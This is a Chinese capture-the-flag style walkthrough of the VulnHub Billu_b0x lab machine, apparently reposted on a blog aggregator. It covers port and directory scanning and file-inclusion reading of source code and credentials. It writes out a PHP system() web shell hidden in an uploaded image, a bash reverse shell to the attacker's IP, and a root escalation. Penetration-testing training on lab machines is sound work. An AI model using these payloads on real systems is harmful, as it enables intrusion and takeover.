VulnHub靶场渗透实战11-Billu_b0x

这篇具有很好参考价值的文章主要介绍了VulnHub靶场渗透实战11-Billu_b0x。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

前言

kali:192.168.3.9 桥接模式。

靶机:192.168.3.12 桥接模式(nat模式也可以,我桥接是为了方便我物理机的浏览器访问)

1.arp扫描(也可用nmapC段发现),主机发现。

获取的靶机IP地址是:192.168.3.12。

arp-scan -l

VulnHub靶场渗透实战11-Billu_b0x

 2.扫描开启的端口和服务。

nmap -sS -sV -T5 -A -p- 192.168.3.12
nmap命令参数的意思。
-p- 端口范围。

-sS 使用TCP SYN扫描。

-sV 进行版本探测。

-T5 使用的是一种快速扫面方式, 扫描速度的级别,范围在(T0-T5)之间,级别越高速度越快。

VulnHub靶场渗透实战11-Billu_b0x

 访问一下80端口开放的web页面。

VulnHub靶场渗透实战11-Billu_b0x

 2.看这页面可能存在SQL注入,用sqlmap跑一下注入。注入失败。

sqlmap -u “http://192.168.3.12” --data "un=admin&ps=admin&login=let%27s+login" --level 3 --dbms mysql

VulnHub靶场渗透实战11-Billu_b0x

VulnHub靶场渗透实战11-Billu_b0x

3.注入失败,那我们就来爆一下目录咯,用dirsearch爆破一下目录。

dirsearch -u http://192.168.3.12

VulnHub靶场渗透实战11-Billu_b0x

 4.访问爆破出来的目录。利用文件包含漏洞获取php源码和账号密码。

访问test.php:页面提示file参数为空,需要提供file参数,

在Firefox的Hackbar或者Brupsuit中,将get请求,变更为post请求,文件包含成功,获得c.php文件。

使用hackerbar post数据,可下载c.php文件:

VulnHub靶场渗透实战11-Billu_b0x

通过同样文件包含的方法,下载add.php、in.php、c.php、index.php、show.php、panel.php等文件,后面可以访问文件的同时,审计文件的源代码。

发现c.php有文件里面有数据库密码,来访问phpmy。

VulnHub靶场渗透实战11-Billu_b0x登录之后,emmm,这个好像是web的账号密码,试一下。

账户:biLLu

密码:hEx_it

VulnHub靶场渗透实战11-Billu_b0x

登录成功。发现文件上传点。发现文件上传点是发现文件名是panel.php,再看一下phpmy目录下有什么文件。还挺多,还有个配置文件config.inc.php。

VulnHub靶场渗透实战11-Billu_b0x

dirsearch -u http://192.168.3.12/phpmy

VulnHub靶场渗透实战11-Billu_b0x 回到火狐浏览器下载源码把panel.php文件下载下来,config.inc.php文件在phpmy目录下,通过URL猜测路径默认在/var/www/phpmy下面。

VulnHub靶场渗透实战11-Billu_b0x

发现用户名密码,之前指纹识别时发现22端口开放,猜测一波,是ssh的账户密码。

账户:root

密码:roottoor

VulnHub靶场渗透实战11-Billu_b0x

 Ssh登录成功。

VulnHub靶场渗透实战11-Billu_b0x

 5:利用文件包含漏洞反弹shell。——涉及到代码审计。

panel.php代码审计存在文件包含漏洞,那我们就通过文件包含把php语句(这里用到图片马)包含到panel.php中,然后执行命令。

VulnHub靶场渗透实战11-Billu_b0x

 下载一张http://192.168.3.12/uploaded_images/中的图片jack.php,文本编辑器打开,在文件中间或末尾加入一句话cmd命令马<?php system($_GET['cmd']); ?> 将文件上传成功。

VulnHub靶场渗透实战11-Billu_b0x

 VulnHub靶场渗透实战11-Billu_b0x

使用burp执行命令:post请求url中加入执行命令的参数:POST /panel.php?cmd=cat%20/etc/passwd;ls

post的body中包含Jack.jpg图片马:load=/uploaded_images/cmd.jpg&continue=continue

成功执行命令cat /etc/passwd;ls

VulnHub靶场渗透实战11-Billu_b0x

用bash反弹shell。

url编码:echo "bash -i >& /dev/tcp/192.168.3.9/4444 0>&1" | bash

VulnHub靶场渗透实战11-Billu_b0x

kali nc开启监听。burp执行命令。拿到权限。

VulnHub靶场渗透实战11-Billu_b0x

 6.提权。(也可用本地提权法)

  • 看到phpmy这个目录在这个权限下,直接进入这目录,因为目录有个配置文件保存这ssh登录的密码-是root权限,所以直接su root,提权成功。

VulnHub靶场渗透实战11-Billu_b0x文章来源地址https://www.toymoban.com/news/detail-429836.html

到了这里,关于VulnHub靶场渗透实战11-Billu_b0x的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(32)
  • 【甄选靶场】Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权)

    Vulnhub百个项目渗透——项目二:Lampiao(SSH爆破,脏牛提权) 靶场地址 提取码:rong 🔥系列专栏:Vulnhub百个项目渗透 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2022年8月30日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢! ` 本文章仅用作实验学习,

    2024年02月06日
    浏览(31)
  • vulnhub靶场实战系列(一)之vulnhub靶场介绍

    Vulnhub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透使用,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞,需要使用VMware或者VirtualBox运行。每个镜像会有破解的目标,大多是Boot2root,从启动虚机到获取操作系统的root权限和查看flag。 我们在学

    2024年02月10日
    浏览(23)
  • 【甄选靶场】Vulnhub百个项目渗透——项目五十六:sp-jerome(squid代理,计划任务)

    Vulnhub百个项目渗透——项目五十六:sp-jerome(文件上传,缓冲区溢出) 🔥系列专栏:Vulnhub百个项目渗透 🎉欢迎关注🔎点赞👍收藏⭐️留言📝 📆首发时间:🌴2023年1月20日🌴 🍭作者水平很有限,如果发现错误,还望告知,感谢! 本文章仅用作实验学习,实验环境均为

    2024年02月01日
    浏览(40)
  • 靶场实战(14):OSCP备考之VulnHub SUNSET NOONTIDE

    打靶思路 资产发现 主机发现 服务发现 漏洞发现(获取权限) irc服务 提升权限 server用户 sudo suid cron 内核提权 信息收集 1.1、主机发现 本次靶场SUNSET: NOONTIDE [1] 指定IP,不涉及主机发现过程。 1.2、服务发现 使用命令 sudo -u root 172.16.33.78 -n -Pn -p- --reason -sV -sC -O ,发现主机开放

    2024年02月02日
    浏览(36)
  • DC-4靶场搭建及渗透实战详细过程(DC靶场系列)

    目录 一. 信息收集 1. 主机扫描 2. 端口扫描 3. 目录扫描 4. 页面信息探测 二. 渗透过程 1. 用户登入爆破 2. 任意命令执行 3. 反弹shell 4. Linux提权(假) 4. Linux提权(真) 5. 查找flag 三. 收获总结 1. netcat反弹shell命令 2. teehee提权 DC-4靶场下载地址https://www.five86.com/downloads/DC-4.zip 搭

    2024年02月05日
    浏览(30)
  • DC-3靶场搭建及渗透实战详细过程(DC靶场系列)

    目录 一. 信息收集 1. 主机扫描 2. 端口扫描  3. 目录扫描 4. web页面信息探测 二. 漏洞找查 1. joomscan 2. searchsploit 三. 漏洞利用 1. SQL注入 2. 密码爆破 3. 反弹shell 4. Get交互shell 四. Linux提权 1. 确定操作系统信息 2. 搜索操作系统漏洞 3. 利用exp提权 4. 找查flag 五. 收获总结 1. joomsca

    2023年04月15日
    浏览(70)
  • 内网渗透思路学习——靶场实战——暗月项目七

    #免责声明: 本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。 靶场地址: https://pan.baidu.com/s/12pSYxSU-ZmurQ9–GFiaXQ 提取码: 3p47 项目七靶场渗透最终目的:获得域控中的flag.txt文件中的内容 项目七靶场环境是用 VMware Workstation 搭建,把环境

    2023年04月10日
    浏览(31)
  • 【网络安全】DVWA靶场实战&BurpSuite内网渗透

    我们先来认识一下BurpSuite中有哪些攻击模式,然后开始实战操作 下面攻击案例即将使用,对单个参数进行攻击破解 联想战争中狙击手的作用,一次只能击杀一名敌人 联想古代的攻城锤,特点就是攻击范围比狙击手大,但是效率不一定高 可以设置多个攻击字段,但是payload值

    2024年02月13日
    浏览(41)
  • 内网渗透之Msf-Socks代理实战(CFS三层靶场渗透过程及思路)

    前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog 内网渗透专栏:https://blog.csdn.net/m0_63127854/category_11885934.html 网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan CFS三层靶场搭建: 内网渗透之CFS三层靶机搭建_不知名白帽的博客-CSD

    2024年02月02日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包